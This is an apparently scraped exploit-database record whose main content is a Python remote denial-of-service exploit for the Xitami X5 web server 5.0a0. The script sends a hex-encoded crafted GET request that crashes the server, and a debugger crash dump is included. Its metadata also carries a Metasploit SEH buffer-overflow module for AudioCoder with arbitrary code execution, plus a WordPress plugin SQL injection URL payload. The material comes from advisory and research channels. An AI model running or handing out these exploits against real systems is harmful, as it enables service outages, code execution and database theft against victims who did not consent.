ID 1337DAY-ID-26448
Type zdt
Reporter Stefan Petrushevski
Modified 2016-12-01T00:00:00
Description
Exploit for windows platform in category dos / poc
#!/usr/bin/env python
#
#
# X5 Webserver 5.0 Remote Denial Of Service Exploit
#
#
# Vendor: iMatrix
# Product web page: http://www.xitami.com
# Affected version: 5.0a0
#
# Summary: X5 is the latest generation web server from iMatix Corporation.
# The Xitami product line stretches back to 1996. X5 is built using iMatix's
# current Base2 technology for multithreading applications. On multicore machines,
# it is much more scalable than Xitami/2.
#
# Desc: The vulnerability is caused due to a NULL pointer dereference when processing
# malicious HEAD and GET requests. This can be exploited to cause denial of service
# scenario.
#
# ----------------------------------------------------------------------------
#
# (12c0.164c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** WARNING: Unable to verify checksum for C:\zslab\ws\64327\xitami-5.0a0-windows\xitami.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\zslab\ws\64327\xitami-5.0a0-windows\xitami.exe
# eax=0070904d ebx=03a91808 ecx=0070904d edx=00000000 esi=0478fef4 edi=0478fe8c
# eip=00503ae0 esp=0478fb28 ebp=0478fb48 iopl=0 nv up ei pl zr na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
# xitami+0x103ae0:
# 00503ae0 8b02 mov eax,dword ptr [edx] ds:002b:00000000=????????
# 0:004> kb
# # ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 00 0478fb48 00460ee6 0ace0840 04025ea0 0478fd78 xitami+0x103ae0
# 01 0478fe8c 0045f6fa 0ace0bd8 0478ff28 cccccccc xitami+0x60ee6
# 02 0478fee8 004c60a1 0478ff14 00000000 0478ff38 xitami+0x5f6fa
# 03 0478ff28 004fdca3 03a90858 03a67e38 00000000 xitami+0xc60a1
# 04 0478ff40 00510293 03a90858 fc134d7d 00000000 xitami+0xfdca3
# 05 0478ff7c 00510234 00000000 0478ff94 7679338a xitami+0x110293
# 06 0478ff88 7679338a 03a91808 0478ffd4 77029902 xitami+0x110234
# 07 0478ff94 77029902 03a91808 7134bcc2 00000000 kernel32!BaseThreadInitThunk+0xe
# 08 0478ffd4 770298d5 00510190 03a91808 00000000 ntdll!__RtlUserThreadStart+0x70
# 09 0478ffec 00000000 00510190 03a91808 00000000 ntdll!_RtlUserThreadStart+0x1b
#
# ----------------------------------------------------------------------------
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
# Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Stefan Petrushevski aka sm - <[email protected]>
#
#
# Advisory ID: ZSL-2016-5377
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5377.php
#
#
# 15.11.2016
#
import sys, socket
if len(sys.argv) < 3:
print '------- X5 Webserver 5.0a0 - Remote Denial of Service ------\n'
print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'
print 'Example: ' + sys.argv[0] + ' 8.8.8.8 80\n'
print '------------------------------------------------------------\n'
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((host, port))
s.settimeout(666)
payload = (
'\x47\x45\x54\x20\x2f\x50\x52\x4e\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a'
'\x48\x6f\x73\x74\x3a\x20\x31\x37\x32\x2e\x31\x39\x2e\x30\x2e\x32\x31\x35\x0d'
'\x0a\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x5a\x53\x4c\x2d\x46\x75'
'\x7a\x7a\x65\x72\x2d\x41\x67\x65\x6e\x74\x2f\x34\x2e\x30\x2e\x32\x38\x35\x20'
'\x0d\x0a\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x78\x6d\x6c\x2c'
'\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x2c\x61\x70\x70'
'\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c'
'\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x74\x65\x78'
'\x74\x2f\x70\x6c\x61\x69\x6e\x3b\x71\x3d\x30\x2e\x38\x2c\x69\x6d\x61\x67\x65'
'\x2f\x70\x6e\x67\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x41\x63\x63'
'\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x75\x73'
'\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45'
'\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x64\x65\x66\x6c\x61'
'\x74\x65\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a'
'\x20\x49\x53\x4f\x2d\x38\x38\x35\x39\x2d\x31\x2c\x75\x74\x66\x2d\x38\x3b\x71'
'\x3d\x30\x2e\x37\x2c\x2a\x3b\x71\x3d\x30\x2e\x37\x0d\x0a\x4b\x65\x65\x70\x2d'
'\x41\x6c\x69\x76\x65\x3a\x20\x33\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74'
'\x69\x6f\x6e\x3a\x20\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x0d\x0a\x0d\x0a'
)
s.send(payload)
s.close
print 'BOOM! \n'
# 0day.today [2018-04-12] #
{"sourceData": "#!/usr/bin/env python\r\n#\r\n#\r\n# X5 Webserver 5.0 Remote Denial Of Service Exploit\r\n#\r\n#\r\n# Vendor: iMatrix\r\n# Product web page: http://www.xitami.com\r\n# Affected version: 5.0a0\r\n#\r\n# Summary: X5 is the latest generation web server from iMatix Corporation.\r\n# The Xitami product line stretches back to 1996. X5 is built using iMatix's\r\n# current Base2 technology for multithreading applications. On multicore machines,\r\n# it is much more scalable than Xitami/2.\r\n#\r\n# Desc: The vulnerability is caused due to a NULL pointer dereference when processing\r\n# malicious HEAD and GET requests. This can be exploited to cause denial of service\r\n# scenario.\r\n#\r\n# ----------------------------------------------------------------------------\r\n#\r\n# (12c0.164c): Access violation - code c0000005 (first chance)\r\n# First chance exceptions are reported before any exception handling.\r\n# This exception may be expected and handled.\r\n# *** WARNING: Unable to verify checksum for C:\\zslab\\ws\\64327\\xitami-5.0a0-windows\\xitami.exe\r\n# *** ERROR: Module load completed but symbols could not be loaded for C:\\zslab\\ws\\64327\\xitami-5.0a0-windows\\xitami.exe\r\n# eax=0070904d ebx=03a91808 ecx=0070904d edx=00000000 esi=0478fef4 edi=0478fe8c\r\n# eip=00503ae0 esp=0478fb28 ebp=0478fb48 iopl=0 nv up ei pl zr na pe nc\r\n# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\n# xitami+0x103ae0:\r\n# 00503ae0 8b02 mov eax,dword ptr [edx] ds:002b:00000000=????????\r\n# 0:004> kb\r\n# # ChildEBP RetAddr Args to Child \r\n# WARNING: Stack unwind information not available. Following frames may be wrong.\r\n# 00 0478fb48 00460ee6 0ace0840 04025ea0 0478fd78 xitami+0x103ae0\r\n# 01 0478fe8c 0045f6fa 0ace0bd8 0478ff28 cccccccc xitami+0x60ee6\r\n# 02 0478fee8 004c60a1 0478ff14 00000000 0478ff38 xitami+0x5f6fa\r\n# 03 0478ff28 004fdca3 03a90858 03a67e38 00000000 xitami+0xc60a1\r\n# 04 0478ff40 00510293 03a90858 fc134d7d 00000000 xitami+0xfdca3\r\n# 05 0478ff7c 00510234 00000000 0478ff94 7679338a xitami+0x110293\r\n# 06 0478ff88 7679338a 03a91808 0478ffd4 77029902 xitami+0x110234\r\n# 07 0478ff94 77029902 03a91808 7134bcc2 00000000 kernel32!BaseThreadInitThunk+0xe\r\n# 08 0478ffd4 770298d5 00510190 03a91808 00000000 ntdll!__RtlUserThreadStart+0x70\r\n# 09 0478ffec 00000000 00510190 03a91808 00000000 ntdll!_RtlUserThreadStart+0x1b\r\n#\r\n# ----------------------------------------------------------------------------\r\n#\r\n# Tested on: Microsoft Windows XP Professional SP3 (EN)\r\n# Microsoft Windows 7 Ultimate SP1 (EN)\r\n#\r\n#\r\n# Vulnerability discovered by Stefan Petrushevski aka sm - <[email\u00a0protected]>\r\n#\r\n#\r\n# Advisory ID: ZSL-2016-5377\r\n# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5377.php\r\n#\r\n#\r\n# 15.11.2016\r\n#\r\n \r\n \r\nimport sys, socket\r\n \r\nif len(sys.argv) < 3:\r\n print '------- X5 Webserver 5.0a0 - Remote Denial of Service ------\\n'\r\n print '\\nUsage: ' + sys.argv[0] + ' <target> <port>\\n'\r\n print 'Example: ' + sys.argv[0] + ' 8.8.8.8 80\\n'\r\n print '------------------------------------------------------------\\n'\r\n sys.exit(0)\r\n \r\nhost = sys.argv[1]\r\nport = int(sys.argv[2])\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnect = s.connect((host, port))\r\ns.settimeout(666)\r\npayload = (\r\n'\\x47\\x45\\x54\\x20\\x2f\\x50\\x52\\x4e\\x20\\x48\\x54\\x54\\x50\\x2f\\x31\\x2e\\x31\\x0d\\x0a'\r\n'\\x48\\x6f\\x73\\x74\\x3a\\x20\\x31\\x37\\x32\\x2e\\x31\\x39\\x2e\\x30\\x2e\\x32\\x31\\x35\\x0d'\r\n'\\x0a\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x5a\\x53\\x4c\\x2d\\x46\\x75'\r\n'\\x7a\\x7a\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x2f\\x34\\x2e\\x30\\x2e\\x32\\x38\\x35\\x20'\r\n'\\x0d\\x0a\\x41\\x63\\x63\\x65\\x70\\x74\\x3a\\x20\\x74\\x65\\x78\\x74\\x2f\\x78\\x6d\\x6c\\x2c'\r\n'\\x61\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x2f\\x78\\x6d\\x6c\\x2c\\x61\\x70\\x70'\r\n'\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x2f\\x78\\x68\\x74\\x6d\\x6c\\x2b\\x78\\x6d\\x6c\\x2c'\r\n'\\x74\\x65\\x78\\x74\\x2f\\x68\\x74\\x6d\\x6c\\x3b\\x71\\x3d\\x30\\x2e\\x39\\x2c\\x74\\x65\\x78'\r\n'\\x74\\x2f\\x70\\x6c\\x61\\x69\\x6e\\x3b\\x71\\x3d\\x30\\x2e\\x38\\x2c\\x69\\x6d\\x61\\x67\\x65'\r\n'\\x2f\\x70\\x6e\\x67\\x2c\\x2a\\x2f\\x2a\\x3b\\x71\\x3d\\x30\\x2e\\x35\\x0d\\x0a\\x41\\x63\\x63'\r\n'\\x65\\x70\\x74\\x2d\\x4c\\x61\\x6e\\x67\\x75\\x61\\x67\\x65\\x3a\\x20\\x65\\x6e\\x2d\\x75\\x73'\r\n'\\x2c\\x65\\x6e\\x3b\\x71\\x3d\\x30\\x2e\\x35\\x0d\\x0a\\x41\\x63\\x63\\x65\\x70\\x74\\x2d\\x45'\r\n'\\x6e\\x63\\x6f\\x64\\x69\\x6e\\x67\\x3a\\x20\\x67\\x7a\\x69\\x70\\x2c\\x64\\x65\\x66\\x6c\\x61'\r\n'\\x74\\x65\\x0d\\x0a\\x41\\x63\\x63\\x65\\x70\\x74\\x2d\\x43\\x68\\x61\\x72\\x73\\x65\\x74\\x3a'\r\n'\\x20\\x49\\x53\\x4f\\x2d\\x38\\x38\\x35\\x39\\x2d\\x31\\x2c\\x75\\x74\\x66\\x2d\\x38\\x3b\\x71'\r\n'\\x3d\\x30\\x2e\\x37\\x2c\\x2a\\x3b\\x71\\x3d\\x30\\x2e\\x37\\x0d\\x0a\\x4b\\x65\\x65\\x70\\x2d'\r\n'\\x41\\x6c\\x69\\x76\\x65\\x3a\\x20\\x33\\x30\\x30\\x0d\\x0a\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74'\r\n'\\x69\\x6f\\x6e\\x3a\\x20\\x6b\\x65\\x65\\x70\\x2d\\x61\\x6c\\x69\\x76\\x65\\x0d\\x0a\\x0d\\x0a'\r\n)\r\n \r\ns.send(payload)\r\ns.close\r\nprint 'BOOM! \\n'\n\n# 0day.today [2018-04-12] #", "history": [], "description": "Exploit for windows platform in category dos / poc", "sourceHref": "https://0day.today/exploit/26448", "reporter": "Stefan Petrushevski", "href": "https://0day.today/exploit/description/26448", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "b0d3d3a91f21189719037cf41ad6dbfa"}, {"key": "href", "hash": "f9a3cf1561eda2dcefc37160e60a66c2"}, {"key": "modified", "hash": "7eeae43f51545714e368cafd698bfb86"}, {"key": "published", "hash": "7eeae43f51545714e368cafd698bfb86"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "089975fc26e8b18986388a085f20ef2b"}, {"key": "sourceData", "hash": "6b37b56268540bf5747156e1dd9d5e5e"}, {"key": "sourceHref", "hash": "8468e09b5450ca578caf02ba402296ae"}, {"key": "title", "hash": "f4431ed03bebd00789d64df9585cfdf2"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 8, "references": [], "lastseen": "2018-04-12T19:46:58", "published": "2016-12-01T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-26448", "hash": "f23629d31a9739bf0530745d526eda9d4a28ec29bbfb3336064806ee52e1254d", "modified": "2016-12-01T00:00:00", "title": "Xitami Web Server 5.0a0 - Denial of Service Exploit", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -1.5, "vector": "NONE", "modified": "2018-04-12T19:46:58"}, "dependencies": {"references": [{"type": "zeroscience", "idList": ["ZSL-2016-5377"]}, {"type": "zdt", "idList": ["1337DAY-ID-20955", "1337DAY-ID-5377"]}], "modified": "2018-04-12T19:46:58"}, "vulnersScore": -1.5}}
{"zeroscience": [{"lastseen": "2019-11-11T16:11:47", "bulletinFamily": "exploit", "description": "Title: X5 Webserver 5.0 Remote Denial Of Service Exploit \nAdvisory ID: [ZSL-2016-5377](<ZSL-2016-5377.php>) \nType: Local/Remote \nImpact: DoS \nRisk: (3/5) \nRelease Date: 30.11.2016 \n\n\n##### Summary\n\nX5 is the latest generation web server from iMatix Corporation. The Xitami product line stretches back to 1996. X5 is built using iMatix's current Base2 technology for multithreading applications. On multicore machines, it is much more scalable than Xitami/2. \n\n##### Description\n\nThe vulnerability is caused due to a NULL pointer dereference when processing malicious HEAD and GET requests. This can be exploited to cause denial of service scenario. \n \n\\-------------------------------------------------------------------------------- \n \n` (12c0.164c): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \n*** WARNING: Unable to verify checksum for C:\\zslab\\ws\\64327\\xitami-5.0a0-windows\\xitami.exe \n*** ERROR: Module load completed but symbols could not be loaded for C:\\zslab\\ws\\64327\\xitami-5.0a0-windows\\xitami.exe \neax=0070904d ebx=03a91808 ecx=0070904d edx=00000000 esi=0478fef4 edi=0478fe8c \neip=00503ae0 esp=0478fb28 ebp=0478fb48 iopl=0 nv up ei pl zr na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 \nxitami+0x103ae0: \n00503ae0 8b02 mov eax,dword ptr [edx] ds:002b:00000000=???????? \n0:004> kb \n# ChildEBP RetAddr Args to Child \nWARNING: Stack unwind information not available. Following frames may be wrong. \n00 0478fb48 00460ee6 0ace0840 04025ea0 0478fd78 xitami+0x103ae0 \n01 0478fe8c 0045f6fa 0ace0bd8 0478ff28 cccccccc xitami+0x60ee6 \n02 0478fee8 004c60a1 0478ff14 00000000 0478ff38 xitami+0x5f6fa \n03 0478ff28 004fdca3 03a90858 03a67e38 00000000 xitami+0xc60a1 \n04 0478ff40 00510293 03a90858 fc134d7d 00000000 xitami+0xfdca3 \n05 0478ff7c 00510234 00000000 0478ff94 7679338a xitami+0x110293 \n06 0478ff88 7679338a 03a91808 0478ffd4 77029902 xitami+0x110234 \n07 0478ff94 77029902 03a91808 7134bcc2 00000000 kernel32!BaseThreadInitThunk+0xe \n08 0478ffd4 770298d5 00510190 03a91808 00000000 ntdll!__RtlUserThreadStart+0x70 \n09 0478ffec 00000000 00510190 03a91808 00000000 ntdll!_RtlUserThreadStart+0x1b \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\niMatrix - <http://www.xitami.com>\n\n##### Affected Version\n\n5.0a0 \n\n##### Tested On\n\nMicrosoft Windows XP Professional SP3 (EN) \nMicrosoft Windows 7 Ultimate SP1 (EN) \n\n##### Vendor Status\n\n[15.11.2016] Vulnerability discovered. \n[17.11.2016] Vendor contacted. \n[29.11.2016] No response from the vendor. \n[30.11.2016] Public security advisory released. \n\n##### PoC\n\n[DxitamiD.py](<../../codes/xitami_dos.txt>)\n\n##### Credits\n\nVulnerability discovered by Stefan Petrushevski - <[stefan@zeroscience.mk](<mailto:stefan@zeroscience.mk>)>\n\n##### References\n\n[1] <https://cxsecurity.com/issue/WLB-2016120003> \n[2] <https://packetstormsecurity.com/files/139963> \n[3] <https://www.exploit-db.com/exploits/40849/> \n[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/119453> \n[5] <http://www.securiteam.com/exploits/6Q02U1FHRU.html>\n\n##### Changelog\n\n[30.11.2016] - Initial release \n[08.12.2016] - Added reference [1], [2], [3] and [4] \n[13.12.2016] - Added reference [5] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2016-11-30T00:00:00", "published": "2016-11-30T00:00:00", "id": "ZSL-2016-5377", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5377.php", "title": "X5 Webserver 5.0 Remote Denial Of Service Exploit", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n<!--\nbody {\n\tbackground-color: #000;\n}\nbody,td,th {\n\tfont-family: Verdana, Geneva, sans-serif;\n}\na:link {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:visited {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:hover {\n\ttext-decoration: underline;\n\tcolor: #666;\n}\na:active {\n\ttext-decoration: none;\n}\n-->\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/xitami_dos.txt"}], "zdt": [{"lastseen": "2018-01-05T15:31:25", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2013-07-01T00:00:00", "published": "2013-07-01T00:00:00", "id": "1337DAY-ID-20955", "href": "https://0day.today/exploit/description/20955", "type": "zdt", "title": "AudioCoder (.lst) - Buffer Overflow (msf)", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n include Msf::Exploit::Seh\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'AudioCoder .lst Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability\r\n occurs when adding an .lst, allowing arbitrary code execution with the privileges\r\n of the user running AudioCoder. This module has been tested successfully on\r\n AudioCoder 0.8.22 over Windows XP SP3 and Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'onying', # Vulnerability discovery and PoC\r\n 'Asesino04' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'OSVDB', 'N/A' ],\r\n [ 'EDB', '26448' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process'\r\n },\r\n 'Platform' => 'win',\r\n 'Payload' =>\r\n {\r\n 'Space' => 6596,\r\n 'BadChars' => \"\\x00\\x5c\\x40\\x0d\\x0a\",\r\n 'DisableNops' => true,\r\n 'StackAdjustment' => -3500,\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'AudioCoder 0.8.22 / Windows XP SP3 / Windows 7 SP1',\r\n {\r\n 'Ret' => 0x66011b56, # libiconv-2.dll\r\n 'Offset' => 765\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'juin 01 2013',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),\r\n ], self.class)\r\n \r\n end\r\n \r\n def exploit\r\n buffer = \"http://\"\r\n buffer << rand_text(target['Offset'])\r\n buffer << generate_seh_record(target.ret)\r\n buffer << payload.encoded\r\n \r\n file_create(buffer)\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/20955"}, {"lastseen": "2018-03-28T03:20:43", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-06-15T00:00:00", "published": "2009-06-15T00:00:00", "id": "1337DAY-ID-5377", "href": "https://0day.today/exploit/description/5377", "type": "zdt", "title": "WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability", "sourceData": "================================================================\r\nWordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability\r\n================================================================\r\n\r\n\r\nWordpress Photoracer Plugin => SQL injection\r\nhttp://wordpress.org/extend/plugins/photoracer/ \r\n\r\nAuthor: Kacper\r\n\r\nPozdrawiam wszystkich z huba dc++, oraz wszystkich z forum, \r\n\r\nPozdro: Ratman, Kopaczka, FDJ\r\n\r\nElo: dla GLOBUSa za pomoc w crackowaniu hasel.\r\n\r\nVuln:\r\n\r\nhttp://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--\r\n\r\n\r\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5377"}]}
